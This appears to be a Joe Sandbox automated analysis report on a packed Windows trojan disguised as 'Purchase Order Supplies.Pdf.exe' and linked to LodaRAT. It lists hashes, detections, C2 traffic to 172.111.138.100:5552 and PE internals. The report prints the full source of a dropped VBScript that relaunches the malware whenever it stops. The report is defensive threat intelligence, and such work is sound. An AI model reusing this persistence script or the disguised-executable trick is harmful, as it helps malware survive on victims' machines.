              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Purchase Order Supplies.Pdf.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\KKRBIX.vbs100%AviraVBS/Runner.VPJI
              C:\Users\user\AppData\Roaming\Windata\Google Update.exe100%Joe Sandbox ML

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              No contacted domains info

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://ip-score.com/checkip/:Purchase Order Supplies.Pdf.exe, 00000001.00000002.2485288040.0000000004CA6000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                172.111.138.100
                		unknownUnited States
                		3223VOXILITYGBtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1541228
                Start date and time:2024-10-24 15:37:46 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 32s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:13
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Purchase Order Supplies.Pdf.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@3/2@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 88
                • Number of non-executed functions: 271
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • VT rate limit hit for: Purchase Order Supplies.Pdf.exe

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                172.111.138.100bf-p2b.exeGet hashmaliciousLodaRATBrowse
                  gry.exeGet hashmaliciousUnknownBrowse
                    dlawt.exeGet hashmaliciousLodaRatBrowse
                      nXi3rwhMmB.exeGet hashmaliciousLodaRatBrowse

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        VOXILITYGBzR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 45.74.58.7
                        5s5Ut98vVh.batGet hashmaliciousUnknownBrowse
                        • 172.94.3.25
                        Marys Organizer 2023 Release.zipGet hashmaliciousRemcosBrowse
                        • 45.74.48.2
                        Dlr7HYI6VL.lnkGet hashmaliciousRemcosBrowse
                        • 172.94.3.25
                        MdkbG2pK4l.lnkGet hashmaliciousRemcosBrowse
                        • 172.94.3.25
                        55Ka50lb6Z.batGet hashmaliciousRemcosBrowse
                        • 172.94.3.25
                        zz91Dcv5Kf.dllGet hashmaliciousRemcosBrowse
                        • 172.94.9.207
                        V9HUU0LCin.dllGet hashmaliciousRemcosBrowse
                        • 172.94.9.207
                        E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
                        • 172.94.15.211
                        Miner-XMR2.exeGet hashmaliciousXmrigBrowse
                        • 172.94.15.211

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Temp\KKRBIX.vbs

                        Download File
                        Process:C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):862
                        Entropy (8bit):5.3210325672744965
                        Encrypted:false
                        SSDEEP:24:dF/UrLvU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/U8t+G+7xLxe0WABNVIqZaVzgA
                        MD5:A2E6DF552F3F3C3C5093B3C8CABB4E29
                        SHA1:7C3C9CF157C8E3B0C99FD9F23232711DA632234E
                        SHA-256:3BCE9C5F93FC18951A825E965F31D9F5894B33CE74087021C081CFE98B1FD5FF
                        SHA-512:91804410DA32C325783968C7EDF06102F818325DE007B2E7E8542200F519F2F05D04ACA02490F8F41F24B713A774F77C6E4A3D8CD4B96E3E4A827EF6F475C07D
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, Author: Joe Security
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Reputation:low
                        Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "Purchase Order Supplies.Pdf.exe"..fileset = """C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                        C:\Users\user\AppData\Roaming\Windata\Google Update.exe

                        Download File
                        Process:C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Category:dropped
                        Size (bytes):945664
                        Entropy (8bit):7.851519096340525
                        Encrypted:false
                        SSDEEP:24576:thloDX0XOf4mHACXg4eCkA6p5lH2udk3W:thloJfzACXKv8B
                        MD5:A842353A8FD25A6B05D0D3CE6AFE8AAD
                        SHA1:453B9ACEB8565D9F838E5BBCD8F694D97741ADA9
                        SHA-256:9169A54C077380847A9D8D532FD0E5558D60F881FF6DCC029B2E04C9F9FB8104
                        SHA-512:CEB261CDDBBB9942FDDC7ADB92D4CC64B2C32051D9F52B5BA39C58D38927FE937ABEEB457B21AA9CE9A5B1E2F07E5F8E08466709F3B7EA9B5254508D14D102BD
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...9..g.........."......P...0...P.......`........@.......................................@...@.......@.....................,...$.......,!..................P...........................................H...........................................UPX0.....P..............................UPX1.....P...`...D..................@....rsrc....0.......&...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Entropy (8bit):7.851519096340525
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.39%
                        • UPX compressed Win32 Executable (30571/9) 0.30%
                        • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        File name:Purchase Order Supplies.Pdf.exe
                        File size:945'664 bytes
                        MD5:a842353a8fd25a6b05d0d3ce6afe8aad
                        SHA1:453b9aceb8565d9f838e5bbcd8f694d97741ada9
                        SHA256:9169a54c077380847a9d8d532fd0e5558d60f881ff6dcc029b2e04c9f9fb8104
                        SHA512:ceb261cddbbb9942fddc7adb92d4cc64b2c32051d9f52b5ba39c58d38927fe937abeeb457b21aa9ce9a5b1e2f07e5f8e08466709f3b7ea9b5254508d14d102bd
                        SSDEEP:24576:thloDX0XOf4mHACXg4eCkA6p5lH2udk3W:thloJfzACXKv8B
                        TLSH:8E15E1E5A780C464E86795B9943BDAA7B433A60ECCA8490C3C95FF0B7D723471027D9B
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........

                        File Icon

                        Icon Hash:2eec8e8cb683b9b1

                        Static PE Info

                        General

                        Entrypoint:0x56a0c0
                        Entrypoint Section:UPX1
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x6715EB39 [Mon Oct 21 05:48:41 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:ef471c0edf1877cd5a881a6a8bf647b9

                        Entrypoint Preview

                        Instruction
                        pushad
                        mov esi, 00516000h
                        lea edi, dword ptr [esi-00115000h]
                        push edi
                        jmp 00007FDB510205BDh
                        nop
                        mov al, byte ptr [esi]
                        inc esi
                        mov byte ptr [edi], al
                        inc edi
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDB5102059Fh
                        mov eax, 00000001h
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        add ebx, ebx
                        jnc 00007FDB510205BDh
                        jne 00007FDB510205DAh
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDB510205D1h
                        dec eax
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        jmp 00007FDB51020586h
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        jmp 00007FDB51020604h
                        xor ecx, ecx
                        sub eax, 03h
                        jc 00007FDB510205C3h
                        shl eax, 08h
                        mov al, byte ptr [esi]
                        inc esi
                        xor eax, FFFFFFFFh
                        je 00007FDB51020627h
                        sar eax, 1
                        mov ebp, eax
                        jmp 00007FDB510205BDh
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDB5102057Eh
                        inc ecx
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDB51020570h
                        add ebx, ebx
                        jne 00007FDB510205B9h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        add ebx, ebx
                        jnc 00007FDB510205A1h
                        jne 00007FDB510205BBh
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jnc 00007FDB51020596h
                        add ecx, 02h
                        cmp ebp, FFFFFB00h
                        adc ecx, 02h
                        lea edx, dword ptr [edi+ebp]
                        cmp ebp, FFFFFFFCh
                        jbe 00007FDB510205C0h
                        mov al, byte ptr [edx]

                        Rich Headers

                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [ASM] VS2012 UPD4 build 61030
                        • [RES] VS2012 UPD4 build 61030
                        • [LNK] VS2012 UPD4 build 61030

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1fd12c0x424.rsrc
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x16b0000x9212c.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1fd5500xc.rsrc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x16a2a40x48UPX1
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        UPX00x10000x1150000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        UPX10x1160000x550000x54400b800abcd27e641e5d9e2cb211185b8dcFalse0.9884145493323442data7.936135213996723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x16b0000x930000x92600b914194c1693b0529a995e23738ea102False0.8552018840734416data7.740007351798353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0x16b4140x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                        RT_ICON0x16b5400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishGreat Britain0.2649377593360996
                        RT_ICON0x16daec0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishGreat Britain0.3646810506566604
                        RT_ICON0x16eb980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishGreat Britain0.5549645390070922
                        RT_ICON0x16f0040x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/mEnglishGreat Britain0.18115257439773264
                        RT_ICON0x1732300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/mEnglishGreat Britain0.0959718443156276
                        RT_STRING0xdca400x594emptyEnglishGreat Britain0
                        RT_STRING0xdcfd40x68aemptyEnglishGreat Britain0
                        RT_STRING0xdd6600x490emptyEnglishGreat Britain0
                        RT_STRING0xddaf00x5fcemptyEnglishGreat Britain0
                        RT_STRING0xde0ec0x65cemptyEnglishGreat Britain0
                        RT_STRING0xde7480x466emptyEnglishGreat Britain0
                        RT_STRING0xdebb00x158emptyEnglishGreat Britain0
                        RT_RCDATA0x183a5c0x791d4data1.0003245418114675
                        RT_GROUP_ICON0x1fcc340x4cdataEnglishGreat Britain0.8157894736842105
                        RT_GROUP_ICON0x1fcc840x14dataEnglishGreat Britain1.15
                        RT_VERSION0x1fcc9c0xdcdataEnglishGreat Britain0.6181818181818182
                        RT_MANIFEST0x1fcd7c0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                        Imports

                        DLLImport
                        KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                        ADVAPI32.dllAddAce
                        COMCTL32.dllImageList_Remove
                        COMDLG32.dllGetSaveFileNameW
                        GDI32.dllLineTo
                        IPHLPAPI.DLLIcmpSendEcho
                        MPR.dllWNetUseConnectionW
                        ole32.dllCoGetObject
                        OLEAUT32.dllVariantInit
                        PSAPI.DLLGetProcessMemoryInfo
                        SHELL32.dllDragFinish
                        USER32.dllGetDC
                        USERENV.dllLoadUserProfileW
                        UxTheme.dllIsThemeActive
                        VERSION.dllVerQueryValueW
                        WININET.dllFtpOpenFileW
                        WINMM.dlltimeGetTime
                        WSOCK32.dllsocket

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishGreat Britain

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-24T15:38:16.421517+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649714172.111.138.1005552TCP
                        2024-10-24T15:38:16.421517+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649716172.111.138.1005552TCP
                        2024-10-24T15:38:16.421517+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649708172.111.138.1005552TCP
                        2024-10-24T15:38:16.421517+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649715172.111.138.1005552TCP
                        2024-10-24T15:38:16.421517+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649711172.111.138.1005552TCP
                        2024-10-24T15:38:16.421517+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649713172.111.138.1005552TCP
                        2024-10-24T15:38:16.421517+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649710172.111.138.1005552TCP
                        2024-10-24T15:38:30.424583+02002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.1649708172.111.138.1005552TCP
                        2024-10-24T15:38:30.424583+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649708172.111.138.1005552TCP
                        2024-10-24T15:38:39.694626+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649709172.111.138.1005552TCP
                        2024-10-24T15:38:40.772870+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649709172.111.138.1005552TCP
                        2024-10-24T15:38:48.781841+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649710172.111.138.1005552TCP
                        2024-10-24T15:38:57.814205+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649711172.111.138.1005552TCP
                        2024-10-24T15:39:06.899902+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649713172.111.138.1005552TCP
                        2024-10-24T15:39:16.326030+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649714172.111.138.1005552TCP
                        2024-10-24T15:39:25.332704+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649715172.111.138.1005552TCP
                        2024-10-24T15:39:34.363167+02002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.1649716172.111.138.1005552TCP
                        2024-10-24T15:39:34.363167+02002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.1649716172.111.138.1005552TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 24, 2024 15:38:29.366883039 CEST497085552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:30.369153023 CEST497085552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:30.424071074 CEST555249708172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:30.424103022 CEST555249708172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:30.424160004 CEST497085552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:30.424231052 CEST497085552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:30.424582958 CEST497085552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:30.435200930 CEST555249708172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:31.177432060 CEST555249708172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:31.177553892 CEST497085552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:31.187586069 CEST497085552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:31.193084002 CEST555249708172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:39.460707903 CEST497095552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:39.694204092 CEST555249709172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:39.694314957 CEST497095552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:39.694626093 CEST497095552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:39.700001955 CEST555249709172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:40.585036039 CEST555249709172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:40.585158110 CEST497095552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:40.647746086 CEST497095552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:40.772789955 CEST555249709172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:40.772870064 CEST497095552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:40.773480892 CEST555249709172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:48.775861979 CEST497105552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:48.781354904 CEST555249710172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:48.781450987 CEST497105552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:48.781841040 CEST497105552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:48.787188053 CEST555249710172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:49.536848068 CEST555249710172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:49.536999941 CEST497105552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:49.544950008 CEST497105552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:49.550347090 CEST555249710172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:57.808199883 CEST497115552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:57.813714027 CEST555249711172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:57.813802958 CEST497115552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:57.814204931 CEST497115552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:57.819468975 CEST555249711172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:58.560822010 CEST555249711172.111.138.100192.168.2.16
                        Oct 24, 2024 15:38:58.560889959 CEST497115552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:58.572863102 CEST497115552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:38:58.578234911 CEST555249711172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:06.891767979 CEST497135552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:06.899525881 CEST555249713172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:06.899600029 CEST497135552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:06.899902105 CEST497135552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:06.905461073 CEST555249713172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:07.650496006 CEST555249713172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:07.650640011 CEST497135552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:07.660490990 CEST497135552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:07.665863991 CEST555249713172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:15.949208975 CEST497145552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:16.325406075 CEST555249714172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:16.325520039 CEST497145552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:16.326030016 CEST497145552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:16.331614017 CEST555249714172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:17.086031914 CEST555249714172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:17.086121082 CEST497145552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:17.146879911 CEST497145552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:17.152621031 CEST555249714172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:25.326711893 CEST497155552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:25.332298994 CEST555249715172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:25.332453966 CEST497155552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:25.332704067 CEST497155552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:25.338439941 CEST555249715172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:26.091114044 CEST555249715172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:26.091245890 CEST497155552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:26.096657038 CEST497155552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:26.102065086 CEST555249715172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:34.356899023 CEST497165552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:34.362795115 CEST555249716172.111.138.100192.168.2.16
                        Oct 24, 2024 15:39:34.362894058 CEST497165552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:34.363167048 CEST497165552192.168.2.16172.111.138.100
                        Oct 24, 2024 15:39:34.368637085 CEST555249716172.111.138.100192.168.2.16

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:1
                        Start time:09:38:19
                        Start date:24/10/2024
                        Path:C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe"
                        Imagebase:0xc90000
                        File size:945'664 bytes
                        MD5 hash:A842353A8FD25A6B05D0D3CE6AFE8AAD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000001.00000002.2485820292.0000000004D11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:false

                        General

                        Target ID:3
                        Start time:09:38:19
                        Start date:24/10/2024
                        Path:C:\Windows\SysWOW64\wscript.exe
                        Wow64 process (32bit):true
                        Commandline:WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs
                        Imagebase:0x380000
                        File size:147'456 bytes
                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2476240013.0000000003460000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2471256103.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2471256103.00000000030D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:4.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:11.4%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:36
